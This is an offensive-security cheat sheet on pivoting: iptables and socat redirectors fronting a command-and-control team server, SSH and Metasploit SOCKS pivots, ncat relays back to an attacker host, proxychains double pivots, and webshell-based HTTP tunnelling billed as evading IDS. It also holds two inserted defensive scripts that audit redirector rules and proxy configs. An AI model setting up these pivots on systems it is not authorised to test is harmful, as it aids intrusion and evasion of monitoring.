Pivots, forwarders, relays

HTTP Forwarding with iptables

My environment in this lab:

  • Team server and its listening port: 10.0.0.2:80
  • Redirector host and its listening port: 10.0.0.5:80
  • Victim host: 10.0.0.11

An easy way to create an HTTP redirector is to use a Linux box and its iptables capability.

iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.2:80
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1
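A defender-side check for the rule set above, added here as an example (not part of the original page): it parses an `iptables-save` dump and flags the three ingredients of the redirector, the DNAT rule in nat/PREROUTING, MASQUERADE in nat/POSTROUTING and an all-accepting FORWARD chain. The dump below is constructed from the rules on this page.

```bash
#!/bin/sh
# Added audit helper (not from the original page). Feed it the output of
# `iptables-save` from a host that is not supposed to forward traffic and
# it prints one finding per redirector ingredient it sees.

# Constructed sample dump: what the iptables rules above produce.
SAMPLE_DUMP='*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j DNAT --to-destination 10.0.0.2:80
-A POSTROUTING -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A FORWARD -j ACCEPT
COMMIT'

# Usage: iptables-save | redirector_findings
# Prints nothing for a host with no redirector configuration.
redirector_findings() {
    awk '
        /^\*/ { table = substr($0, 2); next }        # "*nat", "*filter"
        table == "nat" && /^-A PREROUTING / && /-j DNAT / {
            for (i = 1; i <= NF; i++) if ($i == "--to-destination") dst = $(i + 1)
            print "DNAT in nat/PREROUTING -> " dst
        }
        table == "nat" && /^-A POSTROUTING / && /-j MASQUERADE/ {
            print "MASQUERADE in nat/POSTROUTING"
        }
        table == "filter" && /^:FORWARD ACCEPT/ {
            print "FORWARD policy is ACCEPT"
        }
        table == "filter" && /^-A FORWARD -j ACCEPT$/ {
            print "FORWARD accepts all traffic"
        }
    '
}

# Usage: is_redirector "$dump"
# Exit status 0 when both DNAT and MASQUERADE are present, i.e. the host
# rewrites inbound connections and hides the original client address.
is_redirector() {
    findings=$(printf '%s\n' "$1" | redirector_findings)
    printf '%s\n' "$findings" | grep -q '^DNAT' &&
        printf '%s\n' "$findings" | grep -q '^MASQUERADE'
}
```

Pair it with `sysctl net.ipv4.ip_forward` on the same host; a DNAT rule without forwarding enabled is inert, a forwarding host without these rules may still be routing.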

HTTP Forwarding with SOCAT

SOCAT is another tool that can be used for “dumb pipe” traffic forwarding.
The environment in this exercise remains the same as in the previous scenario.

Setting up an HTTP redirector with socat:

socat TCP4-LISTEN:80,fork TCP4:10.0.0.2:80

SSH pivot

ssh -D localhost:<local_proxy_port> -f -N <user>@<machine_to_pivot>

Metasploit with Meterpreter

msf5 > route add <network_to_proxy_in_CIDR_notation> <meterpreter_session_id>
[*] Route added
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf5 auxiliary(server/socks4a) > run -j

Ncat HTTP proxy

$ ncat -vv --listen 3128 --proxy-type http

Ncat Port Forwarder

On attacker machine:

$ ncat -lv --broker -m2 <port>

On pivot machine:

$ ncat -v <attacker_ip> <attacker_port> -c "ncat -v <host_to_pivot_to> <port_on_final_target>"

Netcat Port Forwarder

On pivot machine:

mknod pivot p
nc -l -p <port_to_listen_on> 0<pivot | nc <ip_to_pivot_to> <port_to_pivot_to> 1>pivot

Proxychains Setup

Install and configure proxychains

tail /etc/proxychains.conf
#socks4 	127.0.0.1 9050
http 172.21.0.3  3128
#<type: http/socks4/socks5> <proxy_host> <proxy_port>

Double Pivot Proxychains

# Pivot 1 using proxychains
ssh -D 1080 user@IP_Network1

# Configure /etc/proxychains.conf to use port 1080
# Pivot 2 using proxychains
proxychains ssh -D 1081 user@IP_Network2

# Configure /etc/proxychains.conf to use port 1081

proxychains nmap...
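For the Proxychains Setup and Double Pivot sections above, an added example (not from the original page) that lists the active hops in a proxychains.conf and rejects malformed entries, so a wrong port or proxy type is caught before a tool is run through the chain. The config below is constructed from the lines shown above plus deliberately broken entries.

```bash
#!/bin/sh
# Added helper (not from the original page): print the proxy hops that
# proxychains will actually use, and report invalid entries.

# Constructed sample config. The two commented/active lines match the page;
# the last two lines are intentionally malformed.
SAMPLE_CONF='# proxychains.conf sample (constructed)
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
#socks4 	127.0.0.1 9050
http 172.21.0.3  3128
socks5 127.0.0.1 1080 user pass
socks9 10.0.0.1 80
http 172.21.0.4 99999'

# Usage: cat /etc/proxychains.conf | active_proxies
# Prints "hop N <type> <host> <port>" for each valid entry after [ProxyList];
# malformed entries go to stderr as "invalid: <line>".
active_proxies() {
    awk '
        /^\[ProxyList\]/ { inlist = 1; next }
        !inlist || /^[ \t]*#/ || /^[ \t]*$/ { next }   # skip comments/blanks
        {
            ok = ($1 == "http" || $1 == "socks4" || $1 == "socks5")
            ok = ok && ($3 ~ /^[0-9]+$/) && ($3 >= 1) && ($3 <= 65535)
            if (ok) print "hop", ++n, $1, $2, $3
            else print "invalid: " $0 > "/dev/stderr"
        }
    '
}

# Usage: hop_count "$conf"  -> number of valid hops in the chain
hop_count() {
    printf '%s\n' "$1" | active_proxies 2>/dev/null | grep -c '^hop'
}
```

With strict_chain, every printed hop must be reachable in order, so a stale 1080 entry left over from the first pivot will break the second.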

PivotSuite

# Similar features to the other tools, but supports multilevel pivoting
# (like Metasploit)

# "Remote" local port forwarding
# On the pivot
$ pivotsuite -S -F --server-option=PF --forward-ip=10.42.42.2 --forward-port=80 --server-ip=192.168.2.105 --server-port=8080

# "Remote" dynamic port forwarding
$ pivotsuite -S -F --server-option=SP --server-ip=192.168.2.105 --server-port=8080

Tunna / Fulcrom (HTTP)

# Everything goes through HTTP
# Can bypass some IPS/IDS

# First step is to deploy a webshell on the target
# Some are shipped with the tool (but not good)
# Can be hard to use

# Then on the attacker machine 
python2 proxy.py -u http://192.168.2.105:8080/conn.php -l 7777 -r 80 -a 10.42.42.2 -v